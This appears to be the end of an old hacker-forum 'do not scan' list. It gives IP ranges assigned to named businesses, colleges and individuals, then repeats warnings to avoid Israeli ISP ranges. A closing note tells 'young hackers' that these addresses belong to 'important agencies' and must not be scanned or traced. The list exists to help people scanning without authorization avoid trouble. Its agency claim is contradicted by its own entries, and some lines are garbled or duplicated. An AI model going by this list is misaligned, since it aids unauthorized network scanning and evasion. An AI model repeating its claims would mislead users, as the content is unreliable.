207.60.5.64 - 207.60.5.127 Woodard & Curran
207.60.5.192 - 207.60.5.255 On Line Services
207.60.6.0 - 207.60.6.63 The 400 Group
207.60.6.64 - 207.60.6.127 RD Hunter and Company
207.60.6.128 - 207.60.6.191 Louis Berger and Associates
207.60.6.192 - 207.60.6.255 Ross-Simons
207.60.7.0 - 207.60.7.63 Eastern Cambridge Savings Bank
207.60.7.64 - 207.60.7.127 Greater Lawrence Community Action Committee
207.60.7.128 - 207.60.7.191 Data Electronic Devices, Inc
207.60.8.0 - 207.60.8.255 Sippican
207.60.9.0 - 207.60.9.31 Alps Sportswear Mfg Co
207.60.9.32 - 207.60.9.63 Escher Group Ltd
207.60.9.64 - 207.60.9.95 West Suburban Elder
207.60.9.96 - 207.60.9.127 Central Bank
207.60.9.128 - 207.60.9.159 Danick Systems
207.60.9.160 - 207.60.9.191 Alps Sportswear Mfg CO
207.60.9.192 - 207.60.9.223 BSCC
207.60.13.16 - 207.60.13.23 Patrons Insurance Group
207.60.13.40 - 207.60.13.47 Athera Technologies
207.60.13.48 - 207.60.13.55 Service Edge Partners Inc
207.60.13.56 - 207.60.13.63 Massachusetts Credit Union League
207.60.13.64 - 207.60.13.71 SierraCom
207.60.13.72 - 207.60.13.79 AI/ FOCS
207.60.13.80 - 207.60.13.87 Extreme soft
207.60.13.96 - 207.60.13.103 Eaton Seo Corp
207.60.13.112 - 207.60.13.119 C. White
207.60.13.120 - 207.60.13.127 Athera
207.60.13.128 - 207.60.13.135 Entropic Systems, INC
207.60.13.136 - 207.60.13.143 Wood Product Manufactureds Associates
207.60.13.160 - 207.60.13.167 Jamestown Distribution
207.60.13.168 - 207.60.13.175 C&M Computers
207.60.13.176 - 207.60.13.183 ABC Used Auto Parts
207.60.13.184 - 207.60.13.191 Tomas Weldon
207.60.13.192 - 207.60.13.199 Tage Inns
207.60.13.200 - 207.60.13.207 Control Module Inc
207.60.13.208 - 207.60.13.215 Hyper Crawler Information Systems
207.60.13.216 - 207.60.13.223 Eastern Bearings
207.60.13.224 - 207.60.13.231 North Shore Data Services
207.60.13.232 - 207.60.13.239 Mas New Hampshire
207.60.14.0 - 207.60.14.255 J. A. Webster
207.60.15.0 - 207.60.15.127 Trilogic
207.60.16.0 - 207.60.16.255 Area 54
207.60.18.0 - 207.60.18.63 Vested Development Inc
207.60.18.64 - 207.60.18.127 Conventures
207.60.21.0 - 207.60.21.255 Don Law Company
207.60.22.0 - 207.60.22.255 Advanced Microsensors
207.60.28.0 - 207.60.28.63 Applied Business Center
207.60.28.64 - 207.60.28.127 Color and Design Exchange
207.60.36.8 - 207.60.36.15 Shaun McCusker
207.60.36.16 - 207.60.36.23 Town of Framingham
207.60.36.24 - 207.60.36.31 AB Software
207.60.36.32 - 207.60.36.39 Seabass Dreams Too Much, Inc
207.60.36.40 - 207.60.36.47 Next Ticketing
207.60.36.48 - 207.60.36.55 Dulsi
207.60.36.56 - 207.60.36.63 The Internet Access Company
207.60.36.64 - 207.60.36.71 Maguire Group
207.60.36.72 - 207.60.36.79 Cogenex
207.60.36.88 - 207.60.36.95 AKNDC
207.60.36.96 - 207.60.36.103 McGovern election commitee
207.60.36.104 - 207.60.36.111 Digital Equipment Corp
207.60.36.112 - 207.60.36.119 PTR - Precision Technologies
207.60.36.120 - 207.60.36.127 Extech
207.60.36.128 - 207.60.36.135 Manfreddi Architects
207.60.36.144 - 207.60.36.151 Parent Naffah
207.60.36.152 - 207.60.36.159 Darling Dolls Inc
207.60.36.160 - 207.60.36.167 Wright Communications
207.60.36.168 - 207.60.36.175 Principle Software
207.60.36.176 - 207.60.36.183 Chris Pet Store
207.60.36.184 - 207.60.36.191 Fifteen Lilies
207.60.36.192 - 207.60.36.199 All-Com Technologies
207.60.37.0 - 207.60.37.31 Cardio Thoracic Surgical Associates, P. A.
207.60.37.32 - 207.60.37.63 Preferred Fixtures Inc
207.60.37.64 - 207.60.37.95 Apple and Eve Distributors
207.60.37.96 - 207.60.37.127 Nelson Copy Supply
207.60.37.128 - 207.60.37.159 Boston Optical Fiber
207.60.37.192 - 207.60.37.223 Fantasia&Company
207.60.41.0 - 207.60.41.255 Infoactive
207.60.48.0 - 207.60.48.255 Curry College
207.60.62.32 - 207.60.62.63 Alternate Power Source
207.60.62.64 - 207.60.62.95 Keystone Howley-White
207.60.62.128 - 207.60.62.159 Bridgehead Associates LTD
207.60.62.160 - 207.60.62.191 County Supply
207.60.62.192 - 207.60.62.223 NH Board of Nursing
207.60.64.0 - 207.60.64.63 Diversified Wireless Technologies
207.60.64.64 - 207.60.64.127 Phytera
207.60.66.0 - 207.60.66.15 The Network Connection
207.60.66.16 - 207.60.66.31 Young Refrigeration
207.60.66.32 - 207.60.66.47 Vision Appraisal Technology
207.60.66.48 - 207.60.66.63 EffNet Inc
207.60.66.64 - 207.60.66.79 Entropic Systems Inc
207.60.66.80 - 207.60.66.95 Finley Properties
207.60.66.96 - 207.60.66.111 Nancy Plowman Associates
207.60.66.112 - 207.60.66.127 Northeast Financial Strategies
207.60.66.128 - 207.60.66.143 Textnology Corp
207.60.66.144 - 207.60.66.159 Groton Neochem LLC
207.60.66.160 - 207.60.66.175 Tab Computers
207.60.66.176 - 207.60.66.191 Patrons Insurance
207.60.66.192 - 207.60.66.207 Chair City Web
207.60.66.208 - 207.60.66.223 Radex, Inc.
207.60.66.224 - 207.60.66.239 Robert Austein
207.60.66.240 - 207.60.66.255 Hologic Inc.
207.60.71.64 - 207.60.71.127 K-Tech International Inc.
207.60.71.128 - 207.60.71.191 Pan Communications
207.60.71.192 - 207.60.71.255 New England College of Finance
207.60.75.128 - 207.60.75.255 Absolve Technology
207.60.78.0 - 207.60.78.127 Extech
207.60.78.128 - 207.60.78.255 The Insight Group
207.60.83.0 - 207.60.83.255 JLM Technologies
207.60.84.0 - 207.60.84.255 Strategic Solutions
207.60.94.0 - 207.60.94.15 McWorks
207.60.94.32 - 207.60.94.47 Rooney RealEstate
207.60.94.48 - 207.60.94.63 Joseph Limo Service
207.60.94.64 - 207.60.94.79 The Portico Group
207.60.94.80 - 207.60.94.95 Event Travel Management Inc
207.60.94.96 - 207.60.94.111 Intellitech International
207.60.94.128 - 207.60.94.143 Orion Partners
207.60.94.144 - 207.60.94.159 Rainbow Software Solution
207.60.94.160 - 207.60.94.175 Grason Stadler Inc
207.60.94.192 - 207.60.94.207 Donnegan System
207.60.95.1 - 207.60.95.255 The Iprax Corp
207.60.102.0 - 207.60.102.63 Coporate IT
207.60.102.64 - 207.60.102.127 Putnam Technologies
207.60.102.128 - 207.60.102.191 Sycamore Networks
207.60.102.192 - 207.60.102.255 Bostek
2?7.6?.10?.128 - 207.60.103.255 Louis Berger and Associates
207.60.104.128 - 207.60.104.191 Hanson Data Systems
207.60.106.128 - 207.60.106.255 Giganet Inc.
207.60.107.0 - 207.60.107.255 Roll Systems
207.60.108.8 - 207.60.108.15 InternetQA
207.60.111.0 - 207.60.111.31 Reading Cooperative Bank
207.60.111.32 - 207.60.111.63 Edco collaborative
207.60.111.64 - 207.60.111.95 DTC Communications Inc
207.60.111.96 - 207.60.111.127 Mike Line
207.60.111.128 - 207.60.111.159 The Steppingstone Foundation
207.60.111.160 - 207.60.111.191 Caton Connector
207.60.111.192 - 207.60.111.223 Refron
207.60.111.224 - 207.60.111.255 Dolabany Comm Group
207.60.112.0 - 207.60.112.255 The CCS Companies
207.60.116.0 - 207.60.116.255 Continental PET Technologies
207.60.122.16 - 207.60.122.23 Corey & Company Designers Inc
207.60.122.24 - 207.60.122.31 SAIC
207.60.122.32 - 207.60.122.39 Netserve Entertainment Group
207.60.122.40 - 207.60.122.47 Avici Systems Inc
207.60.122.48 - 207.60.122.55 Webrdwne
207.60.122.56 - 207.60.122.63 Reality and Wonder
207.60.122.64 - 207.60.122.71 Nishan Desilva
207.60.122.72 - 207.60.122.79 NemaSoft Inc
207.60.122.80 - 207.60.122.87 Patrick Murphy
207.60.122.88 - 207.60.122.95 Corey and Company
207.60.122.96 - 207.60.122.103 Ames Textile Corp
207.60.122.104 - 207.60.122.111 Publicom
207.60.127.0 - Northstar Technologies
207.60.128.0 - 207.60.128.255 Northstar Technologies
207.60.129.0 - 207.60.129.255 Sanga Corp
207.60.129.64 - 207.60.129.127 Fired Up Network
207.60.129.128 - 207.60.129.191 Integrated Data Solutions
207.60.129.192 - 207.60.129.255 Metanext
207.61.* WorldLinx Telecommunications, Inc., Canada
207.120.* BBN Planet, MA

RANGE 208
208.240.xxx.xxx

RANGE 209
209.35.* Interland, Inc., GA

RANGE 212
212.56.107.22
212.143 *** israelis isp's!! dont try those ranges!!
212.149.*** israelis isp's!! dont try those ranges!!
212.159.0.2
212.159.1.1
212.159.1.4
212.159.1.5
212.159.0.2
212.159.1.1
212.159.1.4
212.159.1.5
212.159.33.56
212.159.40.211
212.159.41.173
212.179.*** israelis isp's!! dont try those ranges!!
212.208.0.12.*** israelis isp's!! dont try those ranges!!

RANGE 213
213.8.***.*** israelis isp's!! dont try those ranges!!

RANGE 216
216.25.* 216.94.***.*** 216.247.* 216.248.*.* 217
217.6.* Do not scan

SAUV : this is a sticky topic as this is must for a young hacker to know....or he shall be in trouble.

NEVER TRY TO SCAN OR TRACE THESE IPs B'COS THESE ARE FOR VARIOUS IMPORTANT AGENCIES !
NEVER TRY TO SCAN OR TRACE THESE IPs B'COS THESE ARE FOR VARIOUS IMPORTANT AGENCIES !
NEVER TRY TO SCAN OR TRACE THESE IPs B'COS THESE ARE FOR VARIOUS IMPORTANT AGENCIES !